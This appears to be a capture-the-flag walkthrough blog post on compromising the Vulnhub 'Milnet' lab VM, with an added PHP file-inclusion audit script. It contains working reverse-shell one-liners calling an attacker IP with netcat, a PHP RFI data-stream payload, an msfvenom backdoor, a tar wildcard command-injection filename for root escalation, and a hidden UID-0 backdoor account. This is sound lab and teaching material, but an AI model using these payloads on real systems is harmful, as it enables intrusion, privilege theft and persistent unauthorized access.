In this post we examine Milnet, a vulnerable target hosted on http://www.vulnhub.com.
The pentester began by identifying the IP address of the target using netdiscover.
root@kali2:~# netdiscover -r 192.168.73.0/24
192.168.73.130 00:0c:29:bd:ec:5f 1 60 VMware, Inc.
The pentester used nmap to identify network applications.
root@kali2:~# nmap -Pn -n -p- -T4 192.168.73.130
22/tcp open ssh
80/tcp open http
root@kali2:~# nmap -A -Pn -n -p 22,80 192.168.73.130
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.35
Neither service version appears to be vulnerable to a remote access exploit, so the pentester initiated a password attack against the SSH service using THC Hydra.
root@kali2:/usr/share/wordlists# hydra -l root -P fasttrack.txt -e nsr ssh://192.168.73.130
With the password attack underway, the pentester began enumerating the web server with Nikto. The scan results indicated that a web page, /info.php, was present and may contain sensitive information.
root@kali2:/# nikto -h 192.168.73.130
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
The pentester then began a manual examination of the web server by browsing to each page, reviewing the source code, and understanding the functionality of the web site. After an initial examination, the pentester browsed to the following URI:
This page contains a significant amount of information regarding the PHP version running on the web server.
One entry catches the pentester’s eye, which suggests that a file inclusion vulnerability may be present:
The pentester needs more information to construct an effective attack. The pentester utilized OWASP-ZAP to scan the target web server for vulnerabilities.
root@kali2:/# owasp-zap &
OWASP-ZAP reported a remote file inclusion vulnerability affecting the URI http://192.168.73.130/content.php, in a parameter of the POST request.
To prepare a file inclusion attack, the pentester enabled the Firefox extension Tamper Data, which intercepts HTTP requests so that GET/POST parameters can be modified before they are sent. The pentester opened a netcat listener on TCP port 80, browsed to the affected URI, intercepted the request in Tamper Data, and replaced the POST parameter value with a test exploit string. After submitting the request, the pentester confirmed that this is a classic remote file inclusion vulnerability.
The pentester tried uploading various PHP backdoors and reverse shells; however, the environment prevented that code from executing. Instead, the pentester refined the exploitation to use a PHP data stream, which can result in arbitrary code execution.
The pentester first crafted a test command in PHP:
<?php system('ls -lsa /bin'); ?>
The pentester took the above string, and converted it to base64 using an online base64 encoder.
Next, the pentester constructed the following string:
The pentester then repeated the initial RFI exploit method, this time using the crafted base64 command in the POST parameter value. It worked, and the pentester received the output of the ls -lsa /bin command, revealing the binaries in the /bin directory. The pentester identified netcat among them and prepared a new attack to achieve a remote shell.
First, the pentester opens a listener on his attack platform:
nc -nlvp 1234
Next, the pentester crafts a reverse shell one liner. Notice that traditional netcat reverse shells do not work in this environment; instead, the following string was constructed to achieve the same effect:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.73.133 1234 >/tmp/f'); ?>
The pentester took the above string and base64 encoded it, then crafted the following string, which serves as the reverse shell payload:
As before, the pentester took the reverse shell payload string and inserted it into the POST parameter value of the /content.php request using Tamper Data. The pentester then received a reverse shell with low level privileges of the www-data user.
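As an added audit, not part of the original post, the following shell function checks a PHP web root and php.ini for the three conditions this target combined: a leftover phpinfo() page, a request parameter passed straight to include/require, and allow_url_include switched on, which is the setting that lets a data stream be included at all. The paths and the include pattern it searches for are assumptions, since the post does not show the source of content.php.

```shell
#!/bin/sh
# Added audit script (not from the original post). Reports the conditions that
# together made the file inclusion on this target exploitable. Paths are
# assumptions; the include pattern is a guess at what content.php looked like.
audit_php_rfi() {
    webroot="$1"   # e.g. /var/www/html
    phpini="$2"    # e.g. /etc/php/7.0/cgi/php.ini (assumed path)
    issues=0
    # 1. Leftover phpinfo() pages leak build and configuration details
    #    (the /info.php finding Nikto reported).
    for f in $(find "$webroot" -type f -name '*.php' \
                 -exec grep -l 'phpinfo[[:space:]]*(' {} + 2>/dev/null); do
        echo "INFO-LEAK: $f calls phpinfo()"
        issues=$((issues + 1))
    done
    # 2. include/require fed directly from a request parameter with no
    #    allowlist: the shape of bug behind the content.php POST finding.
    pat='(include|require)(_once)?[[:space:]]*\(?[[:space:]]*\$_(GET|POST|REQUEST)'
    for f in $(find "$webroot" -type f -name '*.php' \
                 -exec grep -lE "$pat" {} + 2>/dev/null); do
        echo "RFI: $f includes a request parameter directly"
        issues=$((issues + 1))
    done
    # 3. allow_url_include=On is what lets data streams and remote URLs be
    #    passed to include/require; set it Off unless a page truly needs it.
    if grep -Eiq '^[[:space:]]*allow_url_include[[:space:]]*=[[:space:]]*(on|1|true|yes)' \
            "$phpini" 2>/dev/null; then
        echo "CONFIG: allow_url_include is enabled in $phpini"
        issues=$((issues + 1))
    fi
    return "$issues"   # exit status is the number of findings; 0 means clean
}
```

Run it as `audit_php_rfi /var/www/html /path/to/php.ini`; a nonzero exit status means at least one finding was printed.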
The pentester then began post-exploitation activities, focusing on privilege escalation. First, the pentester needed a more stable shell. To achieve this, the pentester used msfvenom to create a new reverse shell payload, hosted it on a web server on the attack platform, and used wget from the target to download the file.
On the attack platform:
service apache2 start
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.73.133 lport=4444 -f elf -o backdoor.elf
nc -nlvp 4444
On the target, after downloading backdoor.elf with wget:
chmod 755 backdoor.elf
The pentester now had a more stable shell to the victim. The pentester then used python to spawn a tty terminal for greater functionality.
python3 -c 'import pty; pty.spawn("/bin/sh")'
Now the pentester focused on privilege escalation. The pentester used an automated script to examine the target for any possible privilege escalation vulnerabilities. The privilege escalation script can be downloaded from:
chmod 755 linenum.sh
The script will run through many entries on the system to find possible vulnerabilities. The pentester noticed several entries of interest.
A user known as T. G. Langman appears to be the only conventional user account on the system.
langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash
His home directory is world readable and executable.
drwxr-xr-x 4 langman langman 4.0K May 21 22:27 langman
There is also a backup script that runs every minute.
*/1 * * * * root /backup/backup.sh
The pentester examined the contents of /backup/backup.sh and observed that it uses tar to back up the contents of the /var/www/html directory every minute. This did not appear overtly vulnerable.
tar cf /backup/backup.tgz *
Remembering that Langman's home directory was world readable and executable, the pentester navigated to it and began examining his files, finding one of particular interest:
Section 4.3 of DefenseCode_Unix_WildCards_Gone_Wild.txt reveals a shell command injection technique targeting tar. In essence, the technique works by creating files whose filename contains parameters and arguments that can be injected into shell commands, if the proper conditions exist. The pentester crafts commands in order to try this technique.
First, the pentester opened an additional listener on his attack platform:
nc -nlvp 2112
On the target/victim, the pentester crafts three files to achieve arbitrary command execution stemming from the tar command within the backup.sh script.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.73.133 2112 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
In essence, because the shell expands the * in backup.sh into the filenames in /var/www/html, tar parses the crafted filename as a command-line option and runs shell.sh after the first file is archived. Since the backup.sh script runs as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 2112.
After about 1 minute, the pentester receives a callback and with it, root permissions. The pentester now has total control over the system.
To sustain easy access, the pentester created a new user with root privileges.
useradd -ou 0 -g 0 michael
This target was a great exercise in remote file inclusion and shell poisoning. The best way of mitigating these issues is by sanitizing user input. Remember the old adage of programming: garbage in, garbage out. Thanks for the great exercise Warrior. See you next time on noob2root. Cheers.